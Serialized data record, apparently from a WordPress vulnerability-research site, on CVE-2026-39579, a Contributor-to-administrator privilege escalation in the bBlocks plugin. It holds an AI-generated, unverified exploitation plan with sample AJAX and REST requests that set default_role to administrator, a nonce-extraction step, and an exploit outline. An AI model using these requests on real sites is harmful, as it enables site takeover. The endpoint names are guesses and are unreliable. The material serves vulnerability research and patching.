[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBZgh5kUWkA4BnAdf6nXxrM-HwUiDazac4iB1pg6tNGE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-39579","bblocks-essential-gutenberg-blocks-patterns-collection-authenticated-contributor-privilege-escalation","bBlocks – Essential Gutenberg Blocks & Patterns Collection \u003C= 2.0.31 - Authenticated (Contributor+) Privilege Escalation","The bBlocks – Essential Gutenberg Blocks & Patterns Collection plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.0.31.  This makes it possible for authenticated attackers, with Contributor-level access and above, to elevate their privileges to that of an administrator.","b-blocks",null,"\u003C=2.0.31","2.0.32","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-04-16 00:00:00","2026-04-21 15:26:37",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F89218de3-7bb9-42f5-86d8-48d28c380231?source=api-prod",6,[22,23,24,25,26,27,28,29],"build\u002Fadmin-dashboard.asset.php","build\u002Fadmin-dashboard.js","build\u002Fcarousel\u002Fview.asset.php","build\u002Fcarousel\u002Fview.js","build\u002Fcountdown\u002Fview.asset.php","build\u002Fcountdown\u002Fview.js","build\u002Fform-builder\u002Fview.asset.php","build\u002Fform-builder\u002Fview.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-39579 (bBlocks Privilege Escalation)\n\n## 1. Vulnerability Summary\nThe **bBlocks – Essential Gutenberg Blocks & Patterns Collection** plugin (\u003C= 2.0.31) contains an authenticated privilege escalation vulnerability. The flaw exists because settings-saving functionality (likely via AJAX or REST API) uses an incorrect capability check (e.g., `edit_posts` instead of `manage_options`). This allows users with **Contributor** roles or higher to modify arbitrary WordPress options. By updating the `default_role` to `administrator` and enabling `users_can_register`, an attacker can create a new admin account or potentially modify their own user meta to gain full administrative access.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (most likely) or the WordPress REST API (`\u002Fwp-json\u002F`).\n- **Action\u002FRoute:** Likely `b_blocks_save_settings` or a REST endpoint like `\u002Fwp-json\u002Fb-blocks\u002Fv1\u002Fsettings`.\n- **Payload Parameters:**\n    - `action`: The AJAX action string (e.g., `b_blocks_save_settings`).\n    - `_wpnonce` \u002F `nonce`: Security token.\n    - `settings`: An array or JSON object containing option keys and values.\n- **Vulnerable Parameters:** Any parameter that maps directly to `update_option()`.\n- **Authentication:** Authenticated as **Contributor** (requires `wp-login.php` session).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler or REST route for the admin dashboard (referenced in `build\u002Fadmin-dashboard.js`).\n2.  **Capability Check:** The handler performs a check using `current_user_can( 'edit_posts' )`. Since Contributors can edit posts, they pass this check.\n3.  **Input Processing:** The handler takes a list of settings from `$_POST` or the REST body.\n4.  **Sink:** The handler iterates through the input and calls `update_option( $key, $value )` without a whitelist, or with a whitelist that includes sensitive WordPress core options.\n\n## 4. Nonce Acquisition Strategy\nThe admin dashboard logic is contained in `build\u002Fadmin-dashboard.js`. The nonce is likely localized using `wp_localize_script` in a PHP file (e.g., `includes\u002Fadmin\u002Fclass-admin.php` or the main plugin file).\n\n1.  **Identify Shortcode\u002FPage:** Check the main plugin PHP for `add_menu_page` or `add_shortcode`. Gutenberg plugins often enqueue settings nonces on the block editor screen or a custom dashboard page.\n2.  **Contributor Access:** Navigate to a page accessible by a Contributor (e.g., `\u002Fwp-admin\u002Fpost-new.php` or the plugin's dashboard if allowed).\n3.  **Extraction:**\n    - The JS localization key is likely `bBlocksAdminData` or `bBlocksSettings`.\n    - Use `browser_eval` to extract the nonce:\n      ```javascript\n      \u002F\u002F Example targets to check\n      window.bBlocksAdminData?.nonce\n      window.bBlocksSettings?.nonce\n      window.bBlocksData?.nonce\n      ```\n4.  **Action Check:** Verify if the nonce action in `wp_create_nonce` matches the action in `check_ajax_referer` or `wp_verify_nonce`.\n\n## 5. Exploitation Strategy\n### Step 1: Discover the Endpoint\nGrep the plugin directory for the following:\n- `grep -r \"wp_ajax_b_blocks\" .`\n- `grep -r \"register_rest_route\" .`\n- `grep -r \"update_option\" .`\n\n### Step 2: Prepare Payload\nThe goal is to modify core WordPress settings.\n**Target Options:**\n- `default_role` -> `administrator`\n- `users_can_register` -> `1`\n\n**Sample AJAX Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=b_blocks_save_settings&nonce=[EXTRACTED_NONCE]&settings[default_role]=administrator&settings[users_can_register]=1\n```\n\n### Step 3: Execute Registration\nOnce the options are changed, navigate to `\u002Fwp-login.php?action=register` to create a new account, which will now default to the Administrator role.\n\n## 6. Test Data Setup\n1.  Install WordPress with the `b-blocks` plugin (version \u003C= 2.0.31).\n2.  Create a user with the **Contributor** role.\n3.  Verify current settings: `wp option get default_role` (should be `subscriber`) and `wp option get users_can_register` (should be `0`).\n\n## 7. Expected Results\n- The server returns a `200 OK` or `{\"success\":true}`.\n- The `default_role` option in the database is updated to `administrator`.\n- The `users_can_register` option is updated to `1`.\n\n## 8. Verification Steps\n1.  **Check Options via CLI:**\n    ```bash\n    wp option get default_role\n    wp option get users_can_register\n    ```\n2.  **Check User Escalation (Alternative):** If the payload allowed targeting `wp_capabilities` for a specific user ID, check the role of the contributor:\n    ```bash\n    wp user get [CONTRIBUTOR_ID] --field=roles\n    ```\n\n## 9. Alternative Approaches\n- **Direct Meta Update:** If the vulnerable function uses `update_user_meta` instead of `update_option`, target the Contributor's user ID to change their `wp_capabilities` to `a:1:{s:13:\"administrator\";b:1;}`.\n- **REST API Route:** If the plugin uses REST, the request would be:\n    ```http\n    POST \u002Fwp-json\u002Fb-blocks\u002Fv1\u002Fsettings HTTP\u002F1.1\n    Content-Type: application\u002Fjson\n    X-WP-Nonce: [EXTRACTED_NONCE]\n\n    {\n      \"default_role\": \"administrator\",\n      \"users_can_register\": 1\n    }\n    ```\n    *(Check `register_rest_route` calls to confirm the exact path and parameter structure.)*","The bBlocks plugin (\u003C= 2.0.31) incorrectly uses the 'edit_posts' capability for its settings-saving functionality rather than the 'manage_options' capability. This allows authenticated users with Contributor-level permissions or higher to modify arbitrary WordPress options, including sensitive core settings.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.asset.php\t2026-03-03 09:27:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.asset.php\t2026-03-03 09:27:24.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => '98328efe16bcd91feec8');\n+\u003C?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => 'ef0b16b7bbdff4475bfc');\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.31\u002Fbuild\u002Fadmin-dashboard.js\t2026-03-03 09:27:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fb-blocks\u002F2.0.32\u002Fbuild\u002Fadmin-dashboard.js\t2026-03-03 09:27:24.000000000 +0000\n... (truncated)","1. Authentication: Log in as a user with at least Contributor-level privileges.\n2. Nonce Acquisition: Access the plugin dashboard or a post editing page to extract the security nonce from the localized JavaScript data (e.g., window.bBlocksAdminData.nonce).\n3. Payload Preparation: Construct a POST request targeting the settings-saving endpoint (either wp-admin\u002Fadmin-ajax.php with the action 'b_blocks_save_settings' or the plugin's REST API endpoint).\n4. Privilege Escalation: Include parameters in the request to update sensitive WordPress options, such as setting 'default_role' to 'administrator' and 'users_can_register' to '1'.\n5. Execution: Submit the request. Because the server improperly validates the user's capability as 'edit_posts', the request is authorized.\n6. Verification: Navigate to the registration page to create a new administrator account or observe the elevation of the default role.","gemini-3-flash-preview","2026-04-27 14:20:20","2026-04-27 14:21:01",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.0.31","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fb-blocks\u002Ftags\u002F2.0.31","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fb-blocks.2.0.31.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fb-blocks\u002Ftags\u002F2.0.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fb-blocks.2.0.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fb-blocks\u002Ftags"]